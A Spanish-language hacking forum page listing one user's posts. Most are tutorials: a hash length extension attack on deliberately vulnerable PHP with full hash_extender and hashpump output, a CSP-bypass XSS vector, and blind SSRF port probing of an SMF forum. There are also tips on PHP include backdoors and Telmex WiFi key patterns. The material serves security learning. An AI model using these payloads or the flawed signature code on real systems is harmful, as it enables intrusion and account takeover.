Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - arthusu

#2
debes de saber que es lo que esta cambiando en la sesion para poder predecirla, te recomiendo utilizar la herramienta secuencer de burp suite entonces analizas la sesion para ver que es lo que esta cambiando y si es que lo puedes predecir.
#3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buen dia amigos,

Alguien podría explicarme un poco como funciona el backdoor

Citar2. include() - Requiere: allow_url_fopen.

estoy intentando ver como funciona tal como esta en el post, pero me queda la pantalla en blanco (no muestra nada), muy agradecido de antemano.

Saludos a todos

necesitas tener activado  allow_url_fopen en el archivo php.ini pones: allow_url_fopen = on, saludos
#4
el metodo para flasheo de bios es el mismo que este, la primera vez que lo hice como no soy muy bueno soldando este tipo de componentes les recomiendo aire caliente es lo mejor, saludos
#5
Pentesting / Ataque de extension de longitud
Enero 15, 2019, 01:34:51 AM
¿Que es?

En criptografía y seguridad informática, un ataque de extensión de longitud es un tipo de ataque en el que un atacante puede usar el hash y la longitud del mensaje, para calcular el hash de un mensaje controlado por el atacante.

Código de ejemplo:

Código: php
<?php

$secret = md5('arthusu');

if(isset($_GET['user']))
{
echo md5($secret . ':user');
exit;
}

if(isset($_GET['admin']))
{
echo md5($secret . ':admin');
}

$signature = md5($secret . ':' . $_GET['type']);

if($signature == $_GET['sig'])
{
$data = explode(':', $_GET['type']);

if(end($data) == 'admin')
{
echo 'Tu eres administrador';
}
else
{
echo 'Tu eres un usuario';
}
}
else
{
echo 'Firma invalida';
}

?>




Uso:


?user - pedimos la firma para el usuario



?admin - pedimos la firma para el administrador


?sig=xxxx&type=user – donde sig es la firma obtenida y el type el tipo de usuario



En caso de que la palabra no coincida con la firma generada nos va mostrar un mensage un mensaje de error.



?sig=xxx&type=admin – nos muestra el usuario administrador

Explotación

Haremos uso de un script:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Hash extender en este caso soporta los siguientes hashes para su explotación:

CRC32, MD5, SHA1, SHA256 y SHA512

Ahora identificamos el hash No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Introducimos el hash: 38f7e2f0c5eba427ed6b4b47f24814ea (en mi caso es este) y 0/GetImage%2B%25286%2529.png[/img]

Generamos una nueva firma

arthusu@SEGINF-RED03:/mnt/c/users/jaesoto/hash_extender$ ./hash_extender -f md5 -s 38f7e2f0c5eba427ed6b4b47f24814ea  --data 'user' --append ':admin' --secret-min=7 --secret-max=33 --out-data-format=html

Código: text


Type: md5

Secret length: 7

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 8

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 9

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00h%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 10

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00p%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 11

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00x%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 12

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 13

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%88%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 14

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 15

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%98%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 16

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 17

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 18

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 19

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 20

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 21

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 22

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 23

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 24

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 25

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 26

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 27

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 28

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 29

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%08%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 30

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%10%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 31

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 32

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00+%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 33

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%28%01%00%00%00%00%00%00%3aadmin


Donde los parámetros son los siguientes:

-f xxx le indicamos el tipo de hash

-s xxxx le indicamos la firma que tenemos valida

--data 'xxx' le indicamos el dato conocido en este caso user

--append 'xxx' le indicamos el dato que queremos agregarle en este caso :admin con dos puntos por el explode en este caso 

--out-data-format=xxx le indicamos el formato de salida que le va dar

--secret-min=numero le indicamos un numero de tamaño para el secreto como minimo

--secret-max=numero le indicamos un numero de tamaño para el secreto como maximo



El secreto es en lo que se basa este ataque el tamaño del mismo como en este caso hipotéticamente no sabemos su tamaño (aunque si sabemos que la $signature tiene 32 caracteres el tamaño 😉 ) entonces generamos un rango en este caso del 7 al 33 y comenzamos a probar... 1 por 1.



Para realizar la prueba con hashpump lo hacemos de la siguiente manera:


arthusu@SEGINF-RED03:~$ hashpump

Código: text
Input Signature: 38f7e2f0c5eba427ed6b4b47f24814ea 

Input Data: :user

Input Key Length: 32

Input Data to Add: :admin

12005b20185a5b3feb166cf9017ffa56

:user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin


Como vemos ingresamos la firma con la comenzamos 38f7e2f0c5eba427ed6b4b47f24814ea

Después el dato con el que comenzamos user

Y el tamaño de la firma en este caso 32

Por ultimo el input agregar es :admin el cual esta en un explode por eso : sino fuera el caso no se agrega



Nos da una nueva firma: 12005b20185a5b3feb166cf9017ffa56

Y un payload: :user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin



El cual transformamos \x a % quedando asi: 


user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00(%01%00%00%00%00%00%00:admin

Al ejecutar el payload nos da el resultado correcto.


Conclusión:


Estas vulnerabilidades existen realmente en las aplicaciones web, un ejemplo claro de ello lo podemos encontrar en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dudas y sugerencias pueden comentar, saludos

Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
en los modem telmex hay unos que puedes obtener la contraseña con mac2wepkey, sino es asi los patrones que puedes usar la mayoria de los modem telmex utilizan 0-9 y de la A-F de 10 digitos, saludos!
#7
antes que nada buen post Gabriela, hay que darle uso a las otras opciones que trae son mas utiles:

-d dominio o palabra <- aqui indicas el dominio o la palabra a buscar por ejemplo: -d underc0de o -d No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-b motor <- puedes indicar la lista de motores de busqueda pasiva: baidu, bing, bingapi, crtsh, dogpile, google, google-certificates, googleCSE, googleplus, google-profiles, hunterio, linkedin, netcraft, pgp, threatcrowd,twitter, vhost, virustotal, yahoo, all
- f resultado.html <- guarda el archivo en resultado.html

esas son las opciones basicas y que siempre deben usarse, pero si quieres ir mas adentro y utilizar las nuevas funciones que incluye puedes utilizar:

-v <- busca host virtuales
-n <- reverse dns
-c <- realiza brute force a los dns encontrando mas subdominios
-t <- hace una busqueda tld a los dominios ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta lo buscaria: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, etc
-p <- hace una escaneo de puertos en 80,443,8080 esto es util ya que tambien con esta nueva opcion detectas la toma de un subdominio
-h <- utilizas busquedas en shodan este es de manera pasiva.

Ahora un ejemplo:

Código: php
python3 theHarvester.py -d underc0de.org -b virustotal -c  



Tambien puedes agregar apis como por ejemplo hunter tiene una buena recoleccion de emails:



y utilizar hunter como motor
#8
Hacking ShowOff / [Blind SSRF] Underc0de.org y SMF 2.1
Octubre 27, 2018, 08:03:29 PM
Anteriormente hice un post sobre este ataque en un blog de un amigo, les dejo el enlace para que le peguen una leída.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En la pagina oficial de github de SMF viene el siguiente código:



lo que hace aquí es que parsea la url luego manda a pedir por una funcion llamada fetch_web_data()



viendo el código vemos que valida si la url es http, https o ftp.



En caso de que sea http abre socket y realiza la petición. Ok hasta aquí no veo que blacklistee o tenga una whitelist de puertos, o solo servidores de imágenes aceptadas, por lo cual puedes poner cualquier URL sera aceptada.

Con esto comenzaremos el ataque, abriré burp collaborator client:



Copiare la URL que me genera, y la pondré en la parte de ataque que es donde ponemos la URL.



le podemos indicar el puerto en este caso el puerto 80.

Verificamos en burp collaborator que la petición se realiza correctamente, podemos darle poll now para un refresco.



Ahora haremos el Poc, verificamos puertos abiertos de la pagina nmap con nmapxD:



ok sabiendo esto podemos realizar la petición usando Burp Repeater:



Aquí sabemos que el puerto esta abierto por que la respuesta fue 302 found y tardo poco tiempo en responder



Aqui sabemos que el puerto esta cerrado por que la respuesta fue 302 found y tardo mucho tiempo en responder

Tambien existe otro caso en el cual un puerto esta abierto pero tarda mucho en responder y esto pasa por que la coneccion sigue viva:



y termina dando un resultado sin respuesta:



Esto seria todo, creo que se pueden realizar mas cosas pero no estoy seguro, un ataque Dos por ejemplo dejando sockets abiertos o pidiendo un string muy lardo, en este caso no pude ver nada de la red interna por que no se ve reflejado en el body como tal la respuesta. Si alguien tiene alguna idea de como explotar esta vulnerabilidad en este caso mas a fondo que me la haga saber o si me equivoco tambien, saludos
#9
pueden checar las nuevas adquisiciones desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, saludos
#10
no es por des meritar el post, de hecho no he usado la herramienta pero verificando un poco el codigo mire esto:



el de facebook hace simplemente una peticion post por cada lista que meta la verdad no se a los cuantos intentos te bloquee facebook, viendo el codigo te bloqueara en unos pocos intentos.



el de gmail esta igual ataca por smtp, pero no estoy seguro tengo ya tiempo que no pruebo, pero cuando probe con hydra hace tiempo me bloqueaba por smtp gmail.

los otros dos por lo que veo usan tor por lo cual pueden durar un poco mas en los intentos.
#11
haz lo que dice Gabriela igual existe una aplicación en android que se llama true caller id puedes identificar algunos numeros que algunos usuarios ya han reportado como spam, saludos
#12
Dudas y pedidos generales / Re:Duda existencial
Octubre 05, 2018, 12:23:25 AM
practica no hay nada mejor que practicarlo de esa manera sabrás si te gusta en verdad
#13
Hacking ShowOff / Re:Xss graciosos no persistentes
Octubre 01, 2018, 08:45:01 PM
se llama XSS reflejado y si tiene XSS bro lo que tu estas ejecutando se llama HTML Injection

Aqui un ejemplo del XSS:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No es por desmeritar tu post la verdad me parecen muy buenos tus post, sigue asi!.
#14
Pentesting / Usando Burp con TOR
Septiembre 30, 2018, 12:50:22 PM
Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.


1.- descargamos TOR: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2.- abrimos el navegador de tor vamos a opciones>proxy de red>Configuración... Verificamos el HOST SOCK en mi caso esta así: IP: 127.0.0.1 PUERTO: 9150



3.- ahora abro mozilla firefox e ingreso lo siguiente:



4.- Me dirijo a Burp>User options>SOCKS Proxy>Ingreso proxy:
IP: 127.0.0.1 PORT: 9150

Seleccionamos la opción: Use SOCKS Proxy y tambien Do DNS Lookups over Sock Proxy.



5.- Ingreso a Mi firefox y hago peticiones por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#15
Pentesting / Como saltar CSP (Content Security Policy)
Septiembre 30, 2018, 12:47:32 PM
Introduccion

La política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de código malicioso en el contexto confiable de la pagina web.

Detectando CSP




Primeramente vemos una URL que puede ser posiblemente atacada por XSS. Y hacemos la prueba:




Vemos como se inyecta nuestro codigo pero no se ejecuta entonces, vamos al apartado de Network de nuestro inspeccionador de elementos y vemos lo siguiente:



Un mensaje de error que nos indica claramente como content security police nos esta bloqueando y que solo permite ejecutar scripts del mismo dominio.

Atacar!

El siguiente paso es buscar alguna parte donde se refleje nuestro XSS ya sea un alert, prompt, confirm, etc... puede llegar a ser una imagen, un archivo js, etc...

Primero hay que ver cuales son los dominios que permite para ello vamos hacemos una peticion y vemos la respuesta:




Vemos claramente como se puede solamente inyectar script que sean del mismo dominio. Ejemplo de un vector:

Código: php
<script src="http://pentesterlab.com/arthusublog.js?var=alert(1);" />


Donde alert(1) se refleja en el JS.




Inyectando el vector en donde se encuentra el XSS podemos realizar el bypass:

#16
¿Que es Selenium?

Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero ciertamente no se limita a eso. Las tareas de administracion aburridas basadas en la web pueden (y deberian) ser automatizadas tambien.

Selenium tiene el soporte de algunos de los proveedores mas grandes de navegadores que han tomado (o están tomando) pasos para hacer de Selenium una parte nativa de su navegador. También es la tecnología central en muchas otras herramientas de automatización del navegador, API y frameworks.

¿Que parte de Selenium es apropiada para mi?

Selenium Web Driver

Si quieres:
* Cree robustos paquetes y pruebas de automatizacion de regresion basados en el navegador
* Escalar y distribuir scripts en muchos entornos

Selenium IDE

Si quieres:
* Crear scripts rapidos de reproduccion de errores
* Crear scripts para ayudar en las pruebas exploratorias asistidas por la automatizacion.

Descargar Selenium

Puedes dirigirte a la pagina web de Selenium y en la seccion Download: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Puedes elegir la que mas se adapte a tu proyecto ya sea selenium ide o selenium web driver. En este minitutorial mostraremos algo basico de los dos.


Selenium IDE

En caso de que quieras que sea solamente una accion en especifica siempre la misma accion te recomendaria usar Selenium IDE. El cual se encuentra disponible para firefox y chrome en version complemento, yo utilizare para firefox en este caso:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En el siguiente vídeo veremos como en Selenium entramos a la pagina de mi BLOG, después entramos a una publicación y después volvemos a la pagina inicial, esto es algo básico ya que con Selenium podemos meter datos en un campo, y muchas cosas mas que normalmente podemos hacer manualmente con el navegador.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


También puedes exportar tu código a diferentes partes y hacer mas rápido una ejecución.

Selenium Web Driver

¿Que diferencia hay entre Selenium IDE y Selenium Web Driver?

La mayor diferencia es que con Selenium IDE grabamos las cosas y las reproducimos, pero si quieres que algo sea dinamico y con interaccion debes utilizar programacion y con Selenium Web Driver lo puedes lograr.

Lo primero que debemos realizar es descargarnos el driver de nuestra preferencia se encuentra dentro de la misma pagina oficial de selenium, en mi caso seguire usando firefox:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hay que agregar el driver a variables de entorno.

Y usare tambien el server standalone de selenium en este caso yo utilizare la version 3.8.1:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Utilizare el driver de PHP creado por facebook:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero a realizar es correr mi server standalone de selenium:



Código: php
java -jar selenium-server-standalone-3.8.1.jar -enablePassThrough false


Por ultimo podemos correr nuestro proyecto usando la consola o desde web, no explicare el uso del driver ya que facebook tiene una gran wiki aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por ultimo decirles que con Selenium tenemos una herramienta poderosa para automatizacion de tareas y podriamos hacer cosas grandiosas con el. Un ejemplo:




Por esta introduccion seria todo y les invito a probar Selenium en sus proyectos de automatizacion.[/font]
#17
Dudas y pedidos generales / Re:ayuda con Ngrok kali linux
Septiembre 16, 2018, 11:48:54 AM
Usa otro puerto como 8080, para ver si ese que estas creando no esta siendo usado que es lo mas probable por otra aplicación.
#18
Dudas y pedidos generales / Re:Hackthebox
Septiembre 03, 2018, 05:58:42 PM
escanear? ::)
#19
lo recomendable es que guarde sus datos y realice un hard reset a su celular, si desea puede analizar el apk de sus aplicaciones con apktool descompilandola y con dex2jar, o analizándola con virustotal o  alguna aplicación de código estático para que confirmes tus sospechas, saludos
#20
Hola buenas buenas tiempo sin revisar el foro y estaba viendo que algún contenido todavía es bueno, aunque hay muchos usuarios nuevos que ya no he visto por aquí, quería preguntar sobre una url que encontré creando una herramienta de búsqueda de subdominios, encontré:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y quería saber para cuando esta este proyecto por lanzarse y si serán cursos de pago o normales y si me puedo unir....

y sobre la zona vip quería ver si tenían alguna zona vip donde podamos compartir contenido blackhat, se que el foro es ético y en eso estamos pero una zona vip que no muchas vean y que pueda ser de pago ayudaría al foro y también al staff a publicar mas cosas de interés a todos, no hice una búsqueda antes pero quería ver que opinan sobre esto, saludos